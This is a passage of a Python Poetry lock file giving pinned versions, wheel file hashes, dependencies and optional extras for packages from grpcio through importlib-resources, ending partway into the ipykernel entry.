{file = "grpcio-1.59.0-cp37-cp37m-win_amd64.whl", hash = "sha256:e5378785dce2b91eb2e5b857ec7602305a3b5cf78311767146464bfa365fc897"},
{file = "grpcio-1.59.0-cp38-cp38-linux_armv7l.whl", hash = "sha256:fe976910de34d21057bcb53b2c5e667843588b48bf11339da2a75f5c4c5b4055"},
{file = "grpcio-1.59.0-cp38-cp38-macosx_10_10_universal2.whl", hash = "sha256:c041a91712bf23b2a910f61e16565a05869e505dc5a5c025d429ca6de5de842c"},
{file = "grpcio-1.59.0-cp38-cp38-manylinux_2_17_aarch64.whl", hash = "sha256:0ae444221b2c16d8211b55326f8ba173ba8f8c76349bfc1768198ba592b58f74"},
{file = "grpcio-1.59.0-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ceb1e68135788c3fce2211de86a7597591f0b9a0d2bb80e8401fd1d915991bac"},
{file = "grpcio-1.59.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6c4b1cc3a9dc1924d2eb26eec8792fedd4b3fcd10111e26c1d551f2e4eda79ce"},
{file = "grpcio-1.59.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:871371ce0c0055d3db2a86fdebd1e1d647cf21a8912acc30052660297a5a6901"},
{file = "grpcio-1.59.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:93e9cb546e610829e462147ce724a9cb108e61647a3454500438a6deef610be1"},
{file = "grpcio-1.59.0-cp38-cp38-win32.whl", hash = "sha256:f21917aa50b40842b51aff2de6ebf9e2f6af3fe0971c31960ad6a3a2b24988f4"},
{file = "grpcio-1.59.0-cp38-cp38-win_amd64.whl", hash = "sha256:14890da86a0c0e9dc1ea8e90101d7a3e0e7b1e71f4487fab36e2bfd2ecadd13c"},
{file = "grpcio-1.59.0-cp39-cp39-linux_armv7l.whl", hash = "sha256:34341d9e81a4b669a5f5dca3b2a760b6798e95cdda2b173e65d29d0b16692857"},
{file = "grpcio-1.59.0-cp39-cp39-macosx_10_10_universal2.whl", hash = "sha256:986de4aa75646e963466b386a8c5055c8b23a26a36a6c99052385d6fe8aaf180"},
{file = "grpcio-1.59.0-cp39-cp39-manylinux_2_17_aarch64.whl", hash = "sha256:aca8a24fef80bef73f83eb8153f5f5a0134d9539b4c436a716256b311dda90a6"},
{file = "grpcio-1.59.0-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:936b2e04663660c600d5173bc2cc84e15adbad9c8f71946eb833b0afc205b996"},
{file = "grpcio-1.59.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fc8bf2e7bc725e76c0c11e474634a08c8f24bcf7426c0c6d60c8f9c6e70e4d4a"},
{file = "grpcio-1.59.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:81d86a096ccd24a57fa5772a544c9e566218bc4de49e8c909882dae9d73392df"},
{file = "grpcio-1.59.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:2ea95cd6abbe20138b8df965b4a8674ec312aaef3147c0f46a0bac661f09e8d0"},
{file = "grpcio-1.59.0-cp39-cp39-win32.whl", hash = "sha256:3b8ff795d35a93d1df6531f31c1502673d1cebeeba93d0f9bd74617381507e3f"},
{file = "grpcio-1.59.0-cp39-cp39-win_amd64.whl", hash = "sha256:38823bd088c69f59966f594d087d3a929d1ef310506bee9e3648317660d65b81"},
{file = "grpcio-1.59.0.tar.gz", hash = "sha256:acf70a63cf09dd494000007b798aff88a436e1c03b394995ce450be437b8e54f"},
]
[package.extras]
protobuf = ["grpcio-tools (>=1.59.0)"]
[[package]]
name = "grpcio-status"
version = "1.48.2"
description = "Status proto mapping for gRPC"
optional = true
python-versions = ">=3.6"
files = [
{file = "grpcio-status-1.48.2.tar.gz", hash = "sha256:53695f45da07437b7c344ee4ef60d370fd2850179f5a28bb26d8e2aa1102ec11"},
{file = "grpcio_status-1.48.2-py3-none-any.whl", hash = "sha256:2c33bbdbe20188b2953f46f31af669263b6ee2a9b2d38fa0d36ee091532e21bf"},
]
[package.dependencies]
googleapis-common-protos = ">=1.5.5"
grpcio = ">=1.48.2"
protobuf = ">=3.12.0"
[[package]]
name = "grpcio-tools"
version = "1.48.2"
description = "Protobuf code generator for gRPC"
optional = true
python-versions = ">=3.6"
files = [
{file = "grpcio-tools-1.48.2.tar.gz", hash = "sha256:8902a035708555cddbd61b5467cea127484362decc52de03f061a1a520fe90cd"},
{file = "grpcio_tools-1.48.2-cp310-cp310-linux_armv7l.whl", hash = "sha256:92acc3e10ba2b0dcb90a88ae9fe1cc0ffba6868545207e4ff20ca95284f8e3c9"},
{file = "grpcio_tools-1.48.2-cp310-cp310-macosx_10_10_x86_64.whl", hash = "sha256:e5bb396d63495667d4df42e506eed9d74fc9a51c99c173c04395fe7604c848f1"},
{file = "grpcio_tools-1.48.2-cp310-cp310-manylinux_2_17_aarch64.whl", hash = "sha256:84a84d601a238572d049d3108e04fe4c206536e81076d56e623bd525a1b38def"},
{file = "grpcio_tools-1.48.2-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:70564521e86a0de35ea9ac6daecff10cb46860aec469af65869974807ce8e98b"},
{file = "grpcio_tools-1.48.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bdbbe63f6190187de5946891941629912ac8196701ed2253fa91624a397822ec"},
{file = "grpcio_tools-1.48.2-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:ae56f133b05b7e5d780ef7e032dd762adad7f3dc8f64adb43ff5bfabd659f435"},
{file = "grpcio_tools-1.48.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:f0feb4f2b777fa6377e977faa89c26359d4f31953de15e035505b92f41aa6906"},
{file = "grpcio_tools-1.48.2-cp310-cp310-win32.whl", hash = "sha256:80f450272316ca0924545f488c8492649ca3aeb7044d4bf59c426dcdee527f7c"},
{file = "grpcio_tools-1.48.2-cp310-cp310-win_amd64.whl", hash = "sha256:21ff50e321736eba22210bf9b94e05391a9ac345f26e7df16333dc75d63e74fb"},
{file = "grpcio_tools-1.48.2-cp36-cp36m-linux_armv7l.whl", hash = "sha256:d598ccde6338b2cfbb3124f34c95f03394209013f9b1ed4a5360a736853b1c27"},
{file = "grpcio_tools-1.48.2-cp36-cp36m-macosx_10_10_x86_64.whl", hash = "sha256:a43d26714933f23de93ea0bf9c86c66a6ede709b8ca32e357f9e2181703e64ae"},
{file = "grpcio_tools-1.48.2-cp36-cp36m-manylinux_2_17_aarch64.whl", hash = "sha256:55fdebc73fb580717656b1bafa4f8eca448726a7aa22726a6c0a7895d2f0f088"},
{file = "grpcio_tools-1.48.2-cp36-cp36m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8588819b22d0de3aa1951e1991cc3e4b9aa105eecf6e3e24eb0a2fc8ab958b3e"},
{file = "grpcio_tools-1.48.2-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9771d4d317dca029dfaca7ec9282d8afe731c18bc536ece37fd39b8a974cc331"},
{file = "grpcio_tools-1.48.2-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:d886a9e052a038642b3af5d18e6f2085d1656d9788e202dc23258cf3a751e7ca"},
{file = "grpcio_tools-1.48.2-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:d77e8b1613876e0d8fd17709509d4ceba13492816426bd156f7e88a4c47e7158"},
{file = "grpcio_tools-1.48.2-cp36-cp36m-win32.whl", hash = "sha256:dcaaecdd5e847de5c1d533ea91522bf56c9e6b2dc98cdc0d45f0a1c26e846ea2"},
{file = "grpcio_tools-1.48.2-cp36-cp36m-win_amd64.whl", hash = "sha256:0119aabd9ceedfdf41b56b9fdc8284dd85a7f589d087f2694d743f346a368556"},
{file = "grpcio_tools-1.48.2-cp37-cp37m-linux_armv7l.whl", hash = "sha256:189be2a9b672300ca6845d94016bdacc052fdbe9d1ae9e85344425efae2ff8ef"},
{file = "grpcio_tools-1.48.2-cp37-cp37m-macosx_10_10_x86_64.whl", hash = "sha256:9443f5c30bac449237c3cf99da125f8d6e6c01e17972bc683ee73b75dea95573"},
{file = "grpcio_tools-1.48.2-cp37-cp37m-manylinux_2_17_aarch64.whl", hash = "sha256:e0403e095b343431195db1305248b50019ad55d3dd310254431af87e14ef83a2"},
{file = "grpcio_tools-1.48.2-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5410d6b601d1404835e34466bd8aee37213489b36ee1aad2276366e265ff29d4"},
{file = "grpcio_tools-1.48.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:51be91b7c7056ff9ee48b1eccd4a2840b0126230803a5e09dfc082a5b16a91c1"},
{file = "grpcio_tools-1.48.2-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:516eedd5eb7af6326050bc2cfceb3a977b9cc1144f283c43cc4956905285c912"},
{file = "grpcio_tools-1.48.2-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:d18599ab572b2f15a8f3db49503272d1bb4fcabb4b4d1214ef03aca1816b20a0"},
{file = "grpcio_tools-1.48.2-cp37-cp37m-win32.whl", hash = "sha256:d18ef2adc05a8ef9e58ac46357f6d4ce7e43e077c7eda0a4425773461f9d0e6e"},
{file = "grpcio_tools-1.48.2-cp37-cp37m-win_amd64.whl", hash = "sha256:6d9753944e5a6b6b78b76ce9d2ae0fe3f748008c1849deb7fadcb64489d6553b"},
{file = "grpcio_tools-1.48.2-cp38-cp38-linux_armv7l.whl", hash = "sha256:3c8749dca04a8d302862ceeb1dfbdd071ee13b281395975f24405a347e5baa57"},
{file = "grpcio_tools-1.48.2-cp38-cp38-macosx_10_10_x86_64.whl", hash = "sha256:7307dd2408b82ea545ae63502ec03036b025f449568556ea9a056e06129a7a4e"},
{file = "grpcio_tools-1.48.2-cp38-cp38-manylinux_2_17_aarch64.whl", hash = "sha256:072234859f6069dc43a6be8ad6b7d682f4ba1dc2e2db2ebf5c75f62eee0f6dfb"},
{file = "grpcio_tools-1.48.2-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6cc298fbfe584de8876a85355efbcf796dfbcfac5948c9560f5df82e79336e2a"},
{file = "grpcio_tools-1.48.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f75973a42c710999acd419968bc79f00327e03e855bbe82c6529e003e49af660"},
{file = "grpcio_tools-1.48.2-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:f766050e491d0b3203b6b85638015f543816a2eb7d089fc04e86e00f6de0e31d"},
{file = "grpcio_tools-1.48.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:8e0d74403484eb77e8df2566a64b8b0b484b5c87903678c381634dd72f252d5e"},
{file = "grpcio_tools-1.48.2-cp38-cp38-win32.whl", hash = "sha256:cb75bac0cd43858cb759ef103fe68f8c540cb58b63dda127e710228fec3007b8"},
{file = "grpcio_tools-1.48.2-cp38-cp38-win_amd64.whl", hash = "sha256:cabc8b0905cedbc3b2b7b2856334fa35cce3d4bc79ae241cacd8cca8940a5c85"},
{file = "grpcio_tools-1.48.2-cp39-cp39-linux_armv7l.whl", hash = "sha256:e712a6d00606ad19abdeae852a7e521d6f6d0dcea843708fecf3a38be16a851e"},
{file = "grpcio_tools-1.48.2-cp39-cp39-macosx_10_10_x86_64.whl", hash = "sha256:e7e7668f89fd598c5469bb58e16bfd12b511d9947ccc75aec94da31f62bc3758"},
{file = "grpcio_tools-1.48.2-cp39-cp39-manylinux_2_17_aarch64.whl", hash = "sha256:a415fbec67d4ff7efe88794cbe00cf548d0f0a5484cceffe0a0c89d47694c491"},
{file = "grpcio_tools-1.48.2-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d96e96ae7361aa51c9cd9c73b677b51f691f98df6086860fcc3c45852d96b0b0"},
{file = "grpcio_tools-1.48.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e20d7885a40e68a2bda92908acbabcdf3c14dd386c3845de73ba139e9df1f132"},
{file = "grpcio_tools-1.48.2-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:8a5614251c46da07549e24f417cf989710250385e9d80deeafc53a0ee7df6325"},
{file = "grpcio_tools-1.48.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:ace0035766fe01a1b096aa050be9f0a9f98402317e7aeff8bfe55349be32a407"},
{file = "grpcio_tools-1.48.2-cp39-cp39-win32.whl", hash = "sha256:4fa4300b1be59b046492ed3c5fdb59760bc6433f44c08f50de900f9552ec7461"},
{file = "grpcio_tools-1.48.2-cp39-cp39-win_amd64.whl", hash = "sha256:0fb6c1c1e56eb26b224adc028a4204b6ad0f8b292efa28067dff273bbc8b27c4"},
]
[package.dependencies]
grpcio = ">=1.48.2"
protobuf = ">=3.12.0,<4.0dev"
setuptools = "*"
[[package]]
name = "h11"
version = "0.14.0"
description = "A pure-Python, bring-your-own-I/O implementation of HTTP/1.1"
optional = false
python-versions = ">=3.7"
files = [
{file = "h11-0.14.0-py3-none-any.whl", hash = "sha256:e3fe4ac4b851c468cc8363d500db52c2ead036020723024a109d37346efaa761"},
{file = "h11-0.14.0.tar.gz", hash = "sha256:8f19fbbe99e72420ff35c00b27a34cb9937e902a8b810e2c88300c6f0a3b699d"},
]
[[package]]
name = "h2"
version = "4.1.0"
description = "HTTP/2 State-Machine based protocol implementation"
optional = true
python-versions = ">=3.6.1"
files = [
{file = "h2-4.1.0-py3-none-any.whl", hash = "sha256:03a46bcf682256c95b5fd9e9a99c1323584c3eec6440d379b9903d709476bc6d"},
{file = "h2-4.1.0.tar.gz", hash = "sha256:a83aca08fbe7aacb79fec788c9c0bac936343560ed9ec18b82a13a12c28d2abb"},
]
[package.dependencies]
hpack = ">=4.0,<5"
hyperframe = ">=6.0,<7"
[[package]]
name = "h5py"
version = "3.10.0"
description = "Read and write HDF5 files from Python"
optional = true
python-versions = ">=3.8"
files = [
{file = "h5py-3.10.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:b963fb772964fc1d1563c57e4e2e874022ce11f75ddc6df1a626f42bd49ab99f"},
{file = "h5py-3.10.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:012ab448590e3c4f5a8dd0f3533255bc57f80629bf7c5054cf4c87b30085063c"},
{file = "h5py-3.10.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:781a24263c1270a62cd67be59f293e62b76acfcc207afa6384961762bb88ea03"},
{file = "h5py-3.10.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f42e6c30698b520f0295d70157c4e202a9e402406f50dc08f5a7bc416b24e52d"},
{file = "h5py-3.10.0-cp310-cp310-win_amd64.whl", hash = "sha256:93dd840bd675787fc0b016f7a05fc6efe37312a08849d9dd4053fd0377b1357f"},
{file = "h5py-3.10.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:2381e98af081b6df7f6db300cd88f88e740649d77736e4b53db522d8874bf2dc"},
{file = "h5py-3.10.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:667fe23ab33d5a8a6b77970b229e14ae3bb84e4ea3382cc08567a02e1499eedd"},
{file = "h5py-3.10.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:90286b79abd085e4e65e07c1bd7ee65a0f15818ea107f44b175d2dfe1a4674b7"},
{file = "h5py-3.10.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6c013d2e79c00f28ffd0cc24e68665ea03ae9069e167087b2adb5727d2736a52"},
{file = "h5py-3.10.0-cp311-cp311-win_amd64.whl", hash = "sha256:92273ce69ae4983dadb898fd4d3bea5eb90820df953b401282ee69ad648df684"},
{file = "h5py-3.10.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:3c97d03f87f215e7759a354460fb4b0d0f27001450b18b23e556e7856a0b21c3"},
{file = "h5py-3.10.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:86df4c2de68257b8539a18646ceccdcf2c1ce6b1768ada16c8dcfb489eafae20"},
{file = "h5py-3.10.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ba9ab36be991119a3ff32d0c7cbe5faf9b8d2375b5278b2aea64effbeba66039"},
{file = "h5py-3.10.0-cp312-cp312-win_amd64.whl", hash = "sha256:2c8e4fda19eb769e9a678592e67eaec3a2f069f7570c82d2da909c077aa94339"},
{file = "h5py-3.10.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:492305a074327e8d2513011fa9fffeb54ecb28a04ca4c4227d7e1e9616d35641"},
{file = "h5py-3.10.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:9450464b458cca2c86252b624279115dcaa7260a40d3cb1594bf2b410a2bd1a3"},
{file = "h5py-3.10.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fd6f6d1384a9f491732cee233b99cd4bfd6e838a8815cc86722f9d2ee64032af"},
{file = "h5py-3.10.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3074ec45d3dc6e178c6f96834cf8108bf4a60ccb5ab044e16909580352010a97"},
{file = "h5py-3.10.0-cp38-cp38-win_amd64.whl", hash = "sha256:212bb997a91e6a895ce5e2f365ba764debeaef5d2dca5c6fb7098d66607adf99"},
{file = "h5py-3.10.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:5dfc65ac21fa2f630323c92453cadbe8d4f504726ec42f6a56cf80c2f90d6c52"},
{file = "h5py-3.10.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:d4682b94fd36ab217352be438abd44c8f357c5449b8995e63886b431d260f3d3"},
{file = "h5py-3.10.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:aece0e2e1ed2aab076c41802e50a0c3e5ef8816d60ece39107d68717d4559824"},
{file = "h5py-3.10.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:43a61b2c2ad65b1fabc28802d133eed34debcc2c8b420cb213d3d4ef4d3e2229"},
{file = "h5py-3.10.0-cp39-cp39-win_amd64.whl", hash = "sha256:ae2f0201c950059676455daf92700eeb57dcf5caaf71b9e1328e6e6593601770"},
{file = "h5py-3.10.0.tar.gz", hash = "sha256:d93adc48ceeb33347eb24a634fb787efc7ae4644e6ea4ba733d099605045c049"},
]
[package.dependencies]
numpy = ">=1.17.3"
[[package]]
name = "hnswlib"
version = "0.7.0"
description = "hnswlib"
optional = true
python-versions = "*"
files = [
{file = "hnswlib-0.7.0.tar.gz", hash = "sha256:bc459668e7e44bb7454b256b90c98c5af750653919d9a91698dafcf416cf64c4"},
]
[package.dependencies]
numpy = "*"
[[package]]
name = "hpack"
version = "4.0.0"
description = "Pure-Python HPACK header compression"
optional = true
python-versions = ">=3.6.1"
files = [
{file = "hpack-4.0.0-py3-none-any.whl", hash = "sha256:84a076fad3dc9a9f8063ccb8041ef100867b1878b25ef0ee63847a5d53818a6c"},
{file = "hpack-4.0.0.tar.gz", hash = "sha256:fc41de0c63e687ebffde81187a948221294896f6bdc0ae2312708df339430095"},
]
[[package]]
name = "html2text"
version = "2020.1.16"
description = "Turn HTML into equivalent Markdown-structured text."
optional = true
python-versions = ">=3.5"
files = [
{file = "html2text-2020.1.16-py3-none-any.whl", hash = "sha256:c7c629882da0cf377d66f073329ccf34a12ed2adf0169b9285ae4e63ef54c82b"},
{file = "html2text-2020.1.16.tar.gz", hash = "sha256:e296318e16b059ddb97f7a8a1d6a5c1d7af4544049a01e261731d2d5cc277bbb"},
]
[[package]]
name = "httpcore"
version = "0.18.0"
description = "A minimal low-level HTTP client."
optional = false
python-versions = ">=3.8"
files = [
{file = "httpcore-0.18.0-py3-none-any.whl", hash = "sha256:adc5398ee0a476567bf87467063ee63584a8bce86078bf748e48754f60202ced"},
{file = "httpcore-0.18.0.tar.gz", hash = "sha256:13b5e5cd1dca1a6636a6aaea212b19f4f85cd88c366a2b82304181b769aab3c9"},
]
[package.dependencies]
anyio = ">=3.0,<5.0"
certifi = "*"
h11 = ">=0.13,<0.15"
sniffio = "==1.*"
[package.extras]
http2 = ["h2 (>=3,<5)"]
socks = ["socksio (==1.*)"]
[[package]]
name = "httplib2"
version = "0.22.0"
description = "A comprehensive HTTP client library."
optional = true
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
files = [
{file = "httplib2-0.22.0-py3-none-any.whl", hash = "sha256:14ae0a53c1ba8f3d37e9e27cf37eabb0fb9980f435ba405d546948b009dd64dc"},
{file = "httplib2-0.22.0.tar.gz", hash = "sha256:d7a10bc5ef5ab08322488bde8c726eeee5c8618723fdb399597ec58f3d82df81"},
]
[package.dependencies]
pyparsing = {version = ">=2.4.2,<3.0.0 || >3.0.0,<3.0.1 || >3.0.1,<3.0.2 || >3.0.2,<3.0.3 || >3.0.3,<4", markers = "python_version > \"3.0\""}
[[package]]
name = "httpx"
version = "0.25.0"
description = "The next generation HTTP client."
optional = false
python-versions = ">=3.8"
files = [
{file = "httpx-0.25.0-py3-none-any.whl", hash = "sha256:181ea7f8ba3a82578be86ef4171554dd45fec26a02556a744db029a0a27b7100"},
{file = "httpx-0.25.0.tar.gz", hash = "sha256:47ecda285389cb32bb2691cc6e069e3ab0205956f681c5b2ad2325719751d875"},
]
[package.dependencies]
brotli = {version = "*", optional = true, markers = "platform_python_implementation == \"CPython\" and extra == \"brotli\""}
brotlicffi = {version = "*", optional = true, markers = "platform_python_implementation != \"CPython\" and extra == \"brotli\""}
certifi = "*"
h2 = {version = ">=3,<5", optional = true, markers = "extra == \"http2\""}
httpcore = ">=0.18.0,<0.19.0"
idna = "*"
sniffio = "*"
socksio = {version = "==1.*", optional = true, markers = "extra == \"socks\""}
[package.extras]
brotli = ["brotli", "brotlicffi"]
cli = ["click (==8.*)", "pygments (==2.*)", "rich (>=10,<14)"]
http2 = ["h2 (>=3,<5)"]
socks = ["socksio (==1.*)"]
[[package]]
name = "huggingface-hub"
version = "0.18.0"
description = "Client library to download and publish models, datasets and other repos on the huggingface.co hub"
optional = true
python-versions = ">=3.8.0"
files = [
{file = "huggingface_hub-0.18.0-py3-none-any.whl", hash = "sha256:ee0b6b68acbf6aeb6d083ea081e981c277a1104b82ab67fdf6780ff5396830af"},
{file = "huggingface_hub-0.18.0.tar.gz", hash = "sha256:10eda12b9c1cfa800b4b7c096b3ace8843734c3f28d69d1c243743fb7d7a2e81"},
]
[package.dependencies]
filelock = "*"
fsspec = ">=2023.5.0"
packaging = ">=20.9"
pyyaml = ">=5.1"
requests = "*"
tqdm = ">=4.42.1"
typing-extensions = ">=3.7.4.3"
[package.extras]
all = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "black (==23.7)", "gradio", "jedi", "mypy (==1.5.1)", "numpy", "pydantic (<2.0)", "pytest", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-vcr", "pytest-xdist", "ruff (>=0.0.241)", "soundfile", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3", "urllib3 (<2.0)"]
cli = ["InquirerPy (==0.3.4)"]
dev = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "black (==23.7)", "gradio", "jedi", "mypy (==1.5.1)", "numpy", "pydantic (<2.0)", "pytest", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-vcr", "pytest-xdist", "ruff (>=0.0.241)", "soundfile", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3", "urllib3 (<2.0)"]
docs = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "black (==23.7)", "gradio", "hf-doc-builder", "jedi", "mypy (==1.5.1)", "numpy", "pydantic (<2.0)", "pytest", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-vcr", "pytest-xdist", "ruff (>=0.0.241)", "soundfile", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3", "urllib3 (<2.0)", "watchdog"]
fastai = ["fastai (>=2.4)", "fastcore (>=1.3.27)", "toml"]
inference = ["aiohttp", "pydantic (<2.0)"]
quality = ["black (==23.7)", "mypy (==1.5.1)", "ruff (>=0.0.241)"]
tensorflow = ["graphviz", "pydot", "tensorflow"]
testing = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "gradio", "jedi", "numpy", "pydantic (<2.0)", "pytest", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-vcr", "pytest-xdist", "soundfile", "urllib3 (<2.0)"]
torch = ["torch"]
typing = ["pydantic (<2.0)", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3"]
[[package]]
name = "humanfriendly"
version = "10.0"
description = "Human friendly output for text interfaces using Python"
optional = true
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*"
files = [
{file = "humanfriendly-10.0-py2.py3-none-any.whl", hash = "sha256:1697e1a8a8f550fd43c2865cd84542fc175a61dcb779b6fee18cf6b6ccba1477"},
{file = "humanfriendly-10.0.tar.gz", hash = "sha256:6b0b831ce8f15f7300721aa49829fc4e83921a9a301cc7f606be6686a2288ddc"},
]
[package.dependencies]
pyreadline3 = {version = "*", markers = "sys_platform == \"win32\" and python_version >= \"3.8\""}
[[package]]
name = "humbug"
version = "0.3.2"
description = "Humbug: Do you build developer tools? Humbug helps you know your users."
optional = true
python-versions = "*"
files = [
{file = "humbug-0.3.2-py3-none-any.whl", hash = "sha256:0d302c82019842f4267ed05b54a26b155ab8dc441ac129e2a62c9c4892d53c71"},
{file = "humbug-0.3.2.tar.gz", hash = "sha256:0fca3cdb6db2348e13d7835b1a743ff545e38344fc55ad4e2a083634b12a0a6e"},
]
[package.dependencies]
requests = "*"
[package.extras]
dev = ["black", "mypy", "types-dataclasses", "types-pkg-resources", "types-psutil", "types-requests", "wheel"]
distribute = ["setuptools", "twine", "wheel"]
profile = ["GPUtil", "psutil", "types-psutil"]
[[package]]
name = "hyperframe"
version = "6.0.1"
description = "HTTP/2 framing layer for Python"
optional = true
python-versions = ">=3.6.1"
files = [
{file = "hyperframe-6.0.1-py3-none-any.whl", hash = "sha256:0ec6bafd80d8ad2195c4f03aacba3a8265e57bc4cff261e802bf39970ed02a15"},
{file = "hyperframe-6.0.1.tar.gz", hash = "sha256:ae510046231dc8e9ecb1a6586f63d2347bf4c8905914aa84ba585ae85f28a914"},
]
[[package]]
name = "idna"
version = "3.4"
description = "Internationalized Domain Names in Applications (IDNA)"
optional = false
python-versions = ">=3.5"
files = [
{file = "idna-3.4-py3-none-any.whl", hash = "sha256:90b77e79eaa3eba6de819a0c442c0b4ceefc341a7a2ab77d7562bf49f425c5c2"},
{file = "idna-3.4.tar.gz", hash = "sha256:814f528e8dead7d329833b91c5faa87d60bf71824cd12a7530b5526063d02cb4"},
]
[[package]]
name = "importlib-metadata"
version = "6.8.0"
description = "Read metadata from Python packages"
optional = false
python-versions = ">=3.8"
files = [
{file = "importlib_metadata-6.8.0-py3-none-any.whl", hash = "sha256:3ebb78df84a805d7698245025b975d9d67053cd94c79245ba4b3eb694abe68bb"},
{file = "importlib_metadata-6.8.0.tar.gz", hash = "sha256:dbace7892d8c0c4ac1ad096662232f831d4e64f4c4545bd53016a3e9d4654743"},
]
[package.dependencies]
zipp = ">=0.5"
[package.extras]
docs = ["furo", "jaraco.packaging (>=9)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-lint"]
perf = ["ipython"]
testing = ["flufl.flake8", "importlib-resources (>=1.3)", "packaging", "pyfakefs", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=2.2)", "pytest-mypy (>=0.9.1)", "pytest-perf (>=0.9.2)", "pytest-ruff"]
[[package]]
name = "importlib-resources"
version = "6.1.0"
description = "Read resources from Python packages"
optional = false
python-versions = ">=3.8"
files = [
{file = "importlib_resources-6.1.0-py3-none-any.whl", hash = "sha256:aa50258bbfa56d4e33fbd8aa3ef48ded10d1735f11532b8df95388cc6bdb7e83"},
{file = "importlib_resources-6.1.0.tar.gz", hash = "sha256:9d48dcccc213325e810fd723e7fbb45ccb39f6cf5c31f00cf2b965f5f10f3cb9"},
]
[package.dependencies]
zipp = {version = ">=3.1.0", markers = "python_version < \"3.10\""}
[package.extras]
docs = ["furo", "jaraco.packaging (>=9.3)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (<7.2.5)", "sphinx (>=3.5)", "sphinx-lint"]
testing = ["pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=2.2)", "pytest-mypy (>=0.9.1)", "pytest-ruff", "zipp (>=3.17)"]
[[package]]
name = "iniconfig"
version = "2.0.0"
description = "brain-dead simple config-ini parsing"
optional = false
python-versions = ">=3.7"
files = [
{file = "iniconfig-2.0.0-py3-none-any.whl", hash = "sha256:b6a85871a79d2e3b22d2d1b94ac2824226a63c6b741c88f7ae975f18b6778374"},
{file = "iniconfig-2.0.0.tar.gz", hash = "sha256:2d91e135bf72d31a410b17c16da610a82cb55f6b0477d1a902134b24a455b8b3"},
]
[[package]]
name = "ipykernel"
